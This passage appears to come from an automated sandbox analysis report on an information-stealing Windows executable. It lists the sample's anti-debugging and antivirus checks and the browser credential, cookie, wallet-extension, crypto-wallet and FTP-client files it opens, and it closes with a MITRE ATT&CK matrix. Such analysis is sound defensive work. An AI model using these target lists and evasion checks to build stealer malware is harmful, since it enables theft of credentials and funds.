               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
               Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  System information queried: ModuleInformation
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Process information queried: ProcessInformation

              Anti Debugging

               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Thread information set: HideFromDebugger
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: regmonclass
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: gbdyllo
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: process monitor - sysinternals: www.sysinternals.com
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: procmon_window_class
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: ollydbg
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: filemonclass
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  File opened: NTICE
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  File opened: SICE
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  File opened: SIWVID
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Process queried: DebugPort
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Process queried: DebugPort
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

               Source: ARoqFi68Nr.exe, 00000000.00000002.1597750238.0000000000786000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: 'Program Manager
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Queries volume information: C:\ VolumeInformation
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
               Source: ARoqFi68Nr.exe, 00000000.00000003.1527118619.0000000001131000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527136685.0000000001134000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
               Source: C:\Users\user\Desktop\ARoqFi68Nr.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
              Source: ARoqFi68Nr.exe | String found in binary or memory: Jaxx Liberty
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
              Source: ARoqFi68Nr.exe, 00000000.00000003.1597043984.0000000001134000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: jfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"Sub"},{"en":"mopnmbcafieddcagagd
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505687237.0000000001134000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505373568.0000000001131000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
              Source: Yara match | File source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              MITRE ATT&CK Matrix (techniques grouped by tactic; the number in parentheses is the count shown next to the technique)

              Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
              Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
              Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
              Execution: Windows Management Instrumentation (12), PowerShell (1), At, Cron, Launchd, Scheduled Task
              Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
              Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
              Defense Evasion: Virtualization/Sandbox Evasion (44), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1)
              Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
              Discovery: Query Registry (1), Security Software Discovery (851), Virtualization/Sandbox Evasion (44), Process Discovery (2), File and Directory Discovery (1), System Information Discovery (223)
              Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
              Collection: Data from Local System (41), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
              Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
              Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
              Source | Detection | Scanner | Label
